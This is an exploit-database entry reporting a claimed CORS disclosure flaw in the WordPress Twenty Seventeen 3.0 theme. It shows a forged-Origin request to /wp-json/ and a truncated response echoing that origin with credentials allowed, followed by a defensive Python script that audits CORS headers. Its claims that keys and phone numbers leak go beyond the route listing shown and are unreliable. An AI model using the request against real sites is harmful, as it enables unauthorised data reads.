0day.today - Biggest Exploit Database in the World.
WordPress Twenty Seventeen 3.0 Cross-origin resource sharing information Vulnerability
## Title: WordPress 6.0.2 - THEME - Twenty Seventeen: 3.0 - CORS-Vulnerability

## Author: nu11secur1ty

## Vendor: https://wordpress.org/

## Software: Twenty Seventeen Version: 3.0

## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Twenty-Seventeen-3.0

## Description:

The theme Twenty Seventeen 3.0 is vulnerable to a CORS (cross-origin resource sharing) information disclosure. An attacker can obtain very sensitive information from the system, such as usernames, authentication keys, phone numbers, some library information, etc. Using this information, the attacker can organize other, more dangerous attacks against the system and cause serious damage. In the captured exchange below, the response returns the request's `Origin` value in `Access-Control-Allow-Origin` and sets `Access-Control-Allow-Credentials: true`.

STATUS: Medium - HIGH

[+] Payload REQUEST:

```
GET /wordpress/wp-json/ HTTP/1.1
Host: pwnedhost.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="105", "Chromium";v="105"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Origin: http://pwnedhost1.com/
```

[+] Payload RESPONSE:

```
HTTP/1.1 200 OK
Date: Wed, 07 Sep 2022 11:08:52 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/8.1.6
X-Powered-By: PHP/8.1.6
X-Robots-Tag: noindex
Link: <http://pwnedhost.com/wordpress/wp-json/>; rel="https://api.w.org/"
X-Content-Type-Options: nosniff
Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link
Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type
Allow: GET
Access-Control-Allow-Origin: http://pwnedhost1.com/
Access-Control-Allow-Methods: OPTIONS, GET, POST, PUT, PATCH, DELETE
Access-Control-Allow-Credentials: true
Vary: Origin
Connection: close
Content-Type: application/json; charset=UTF-8
Content-Length: 161249

{"name":"nu11secur1ty","description":"Just another WordPress site","url":"http:\/\/pwnedhost.com\/wordpress","home":"http:\/\/pwnedhost.com\/wordpress","gmt_offset":"0","timezone_string":"","namespaces":["oembed\/1.0","wp\/v2","wp-site-health\/v1","wp-block-editor\/v1"],"authentication":[],"routes":{"\/":{"namespace":"","methods":["GET"],"endpoints":[{"methods":["GET"],"args":{"context":{"default":"view","required":false}}}],"_links":{"self":[{"href":"http:\/\/pwnedhost.com\/wordpress\/wp-json\/"}]}},"\/batch\/v1":{"namespace":"","methods":["POST"],"endpoints":[{"methods":["POST"],"args":{"validation":{"type":"string","enum":["require-all-validate","normal"],"default":"normal","required":false},"requests":{"type":"array","maxItems":25,"items":{"type":"object","properties":{"method":{"type":"string","enum":["POST","PUT","PATCH","DELETE"],"default":"POST"},"path":{"type":"string","required":true},"body":{"type":"object","properties":[],"additionalProperties":true},"headers":{"type":"object","properties":[],"additionalProperties":{"type":["string","array"],"items":{"type":"string"}}}}},"required":true}}}],"_links":{"self":[{"href":"http:\/\/pwnedhost.com\/wordpress\/wp-json\/batch\/v1"}]}},"\/oembed\/1.0":{"namespace":"oembed\/1.0","methods":["GET"],"endpoints":[{"methods":["GET"],"args":{"namespace":{"default":"oembed\/1.0","required":false},"context":{"default":"view","required":false}}}],"_links":{"self":[{"href":"http:\/\/pwnedhost.com\/wordpress\/wp-json\/oembed\/1.0"}]}},"\/oembed\/1.0\/embed":{"namespace":"oembed\/1.0","methods":["GET"],"endpoints":[{"methods":["GET"],"args":{"url":{"description":"The URL of the resource for which to fetch oEmbed 
data.","type":"string","format":"uri","required":true},"format":{"default":"json","required":false},"maxwidth":{"default":600,"required":false}}}],"_links":{"self":[{"href":"http:\/\/pwnedhost.com\/wordpress\/wp-json\/oembed\/1.0\/embed"}]}},"\/oembed\/1.0\/proxy":{"namespace":"oembed\/1.0","methods":["GET"],"endpoints":[{"methods":["GET"],"args":{"url":{"description":"The URL of the resource for which to fetch oEmbed data.","type":"string","format":"uri","required":true},"format":{"description":"The oEmbed format to use.","type":"string","default":"json","enum":["json","xml"],"required":false},"maxwidth":{"description":"The maximum width of the embed frame in pixels.","type":"integer","default":600,"required":false},"maxheight":{"description":"The maximum height of the embed frame in pixels.","type":"integer","required":false},"discover":{"description":"Whether to perform an oEmbed discovery request for unsanctioned providers.","type":"boolean","default":true,"required":false}}}],"_links":{"self":[{"href":"http:\/\/pwnedhost.com\/wordpress\/wp-json\/oembed\/1.0\/proxy"}]}},"\/wp\/v2":{"namespace":"wp\/v2","methods":["GET"],"endpoints":[{"methods":["GET"],"args":{"namespace":{"default":"wp\/v2","required":false},"context":{"default":"view","required":false}}}],"_links":{"self":[{"href":"http:\/\/pwnedhost.com\/wordpress\/wp-json\/wp\/v2"}]}},"\/wp\/v2\/posts":{"namespace":"wp\/v2","methods":["GET","POST"],"endpoints":[{"methods":["GET"],"allow_batch":{"v1":true},"args":{"context":{"description":"Scope under which the request is made; determines fields present in response.","type":"string","enum":["view","embed","edit"],"default":"view","required":false},"page":{"description":"Current page of the collection.","type":"integer","default":1,"minimum":1,"required":false},"per_page":{"description":"Maximum number of items to be returned in result set.","type":"integer","default":10,"minimum":1,"maximum":100,"required":false},"search":{"description":"Limit results to 
those matching a string.","type":"string","required":false},"after":{"description":"Limit response to posts published after a given ISO8601 compliant date.","type":"string","format":"date-time","required":false},"modified_after":{"description":"Limit response to posts modified after a given ISO8601 compliant date.","type":"string","format":"date-time","required":false},"author":{"description":"Limit result set to posts assigned to specific authors.","type":"array","items":{"type":"integer"},"default":[],"required":false},"author_exclude":{"description":"Ensure result set excludes posts assigned to specific authors.","type":"array","items":{"type":"integer"},"default":[],"required":false},"before":{"description":"Limit response to posts published before a given ISO8601 compliant date.","type":"string","format":"date-time","required":false},"modified_before":{"description":"Limit response to posts modified before a given ISO8601 compliant date.","type":"string","format":"date-time","required":false},"exclude":{"description":"Ensure result set excludes specific IDs.","type":"array","items":{"type":"integer"},"default":[],"required":false},"include":{"description":"Limit result set to specific IDs.","type":"array","items":{"type":"integer"},"default":[],"required":false},"offset":{"description":"Offset the result set by a specific number of items.","type":"integer","required":false},"order":{"description":"Order sort attribute ascending or descending.","type":"string","default":"desc","enum":["asc","desc"],"required":false},"orderby":{"description":"Sort collection by post attribute.","type":"string","default":"date","enum":["author","date","id","include","modified","parent","relevance","slug","include_slugs","title"],"required":false},"slug":{"description":"Limit result set to posts with one or more specific slugs.","type":"array","items":{"type":"string"},"required":false},"status":{"default":"publish","description":"Limit result set to posts assigned one or more 
statuses.","type":"array","items":{"enum":["publish","future","draft","pending","private","trash","auto-draft","inherit","request-pending","request-confirmed","request-failed","request-completed","any"],"type":"string"},"required":false},"tax_relation":{"description":"Limit result set based on relationship between multiple taxonomies.","type":"string","enum":["AND","OR"],"required":false},"categories":{"description":"Limit result set to items with specific terms
```

## Reproduce:

[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Twenty-Seventeen-3.0)

## Proof and Exploit:

[href](https://streamable.com/5bohx4)

# 0day.today [2024-11-15] #
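
The captured response echoes the request's `Origin` in `Access-Control-Allow-Origin` alongside `Access-Control-Allow-Credentials: true`. The check below is an added example, not part of the original advisory: it audits one captured exchange for that pattern and shows an exact-match allowlist grant for comparison. `audit_cors`, `cors_grant` and `trusted_origins` are hypothetical names, and the sample headers are excerpted from the capture on this page.

```python
# Added example (not from the advisory): audit one captured exchange for
# permissive CORS. SAMPLE_* are header excerpts copied from the capture above.
SAMPLE_REQUEST = """GET /wordpress/wp-json/ HTTP/1.1
Host: pwnedhost.com
Origin: http://pwnedhost1.com/
"""
SAMPLE_RESPONSE = """HTTP/1.1 200 OK
Access-Control-Allow-Origin: http://pwnedhost1.com/
Access-Control-Allow-Credentials: true
Vary: Origin
Content-Type: application/json; charset=UTF-8
"""

def parse_headers(raw):
    """Return {lower-case name: value} for a raw HTTP head; start line skipped."""
    headers = {}
    for line in raw.strip().splitlines()[1:]:
        if not line.strip():
            break  # a blank line ends the header section
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers

def audit_cors(raw_request, raw_response, trusted_origins=()):
    """Return findings for one exchange; trusted_origins is a hypothetical allowlist."""
    req, resp = parse_headers(raw_request), parse_headers(raw_response)
    origin = req.get("origin", "")
    acao = resp.get("access-control-allow-origin", "")
    creds = resp.get("access-control-allow-credentials", "").lower() == "true"
    if not acao:
        return []  # no CORS grant, so browsers block cross-origin reads
    findings = []
    if acao == "*":
        findings.append("wildcard-origin")
    elif acao == "null":
        findings.append("null-origin-allowed")
    elif acao == origin and origin not in trusted_origins:
        findings.append("echoes-untrusted-origin")
    if creds and findings:
        findings.append("credentials-allowed")
    if acao != "*" and "origin" not in resp.get("vary", "").lower():
        findings.append("missing-vary-origin")  # caches may serve the wrong grant
    return findings

def cors_grant(origin, trusted_origins):
    """Hardened policy: grant only exact allowlist matches, never echo blindly."""
    if origin in trusted_origins:
        return {"Access-Control-Allow-Origin": origin,
                "Access-Control-Allow-Credentials": "true", "Vary": "Origin"}
    return {"Vary": "Origin"}  # no grant: browsers block cross-origin reads
```

A single capture only shows that this one origin was echoed; repeating the audit with a second unrelated origin and with the site's real allowlist distinguishes blind reflection from an intentional grant.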